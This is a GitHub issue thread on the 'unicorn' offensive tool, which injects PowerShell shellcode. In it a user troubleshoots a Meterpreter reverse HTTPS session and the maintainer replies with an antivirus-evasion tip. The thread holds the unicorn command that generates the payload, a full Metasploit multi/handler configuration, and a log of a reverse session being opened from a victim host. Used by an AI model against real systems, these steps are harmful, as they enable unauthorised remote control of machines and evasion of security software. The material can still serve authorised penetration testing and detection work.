trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. Based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com

load stdapi - Failed to load extension: No response was received to the core_enumextcmd request. #128

Closed myexploit closed 5 years ago

myexploit commented 5 years ago

Sorry for the spoon feed question,

But I'm getting "Failed to load extension: No response was received to the core_enumextcmd request." when I try and load stdapi in MSF.

I'm using the PS one-liner:

python unicorn.py windows/meterpreter/reverse_https 192.168.1.22 443

Quick Google and the most common response is that the error is down to not setting the lhost, which is not the case, as I can see lhost is set in the .rc?

Thanks

trustedsec commented 5 years ago

Type load stdapi, load priv, by default we don't load those specific modules due to AV evasion. Hope that helps! Let me know if you need anything else.

myexploit commented 5 years ago

Thanks, I tried and suspect this is me, but I'm getting the following.

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.1.31
LHOST => 192.168.1.31
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > set AutoVerifySession false
AutoVerifySession => false
msf5 exploit(multi/handler) > set AutoSystemInfo false
AutoSystemInfo => false
msf5 exploit(multi/handler) > set AutoLoadStdapi false
AutoLoadStdapi => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://192.168.1.31:443

msf5 exploit(multi/handler) > [*] https://192.168.1.31:443 handling request from 192.168.1.20; (UUID: lbgw4yae) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.31:443 -> 192.168.1.20:1102) at 2019-06-11 06:45:10 -0400

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
[-] Unknown command: shell.
meterpreter > load stdapi priv
Loading extension stdapi...
[-] Failed to load extension: No response was received to the core_enumextcmd request.
Loading extension priv...
[-] Failed to load extension: No response was received to the core_enumextcmd request.
meterpreter > load stdapi
Loading extension stdapi...
[-] Failed to load extension: No response was received to the core_enumextcmd request.
meterpreter > load priv
Loading extension priv...
[-] Failed to load extension: No response was received to the core_enumextcmd request.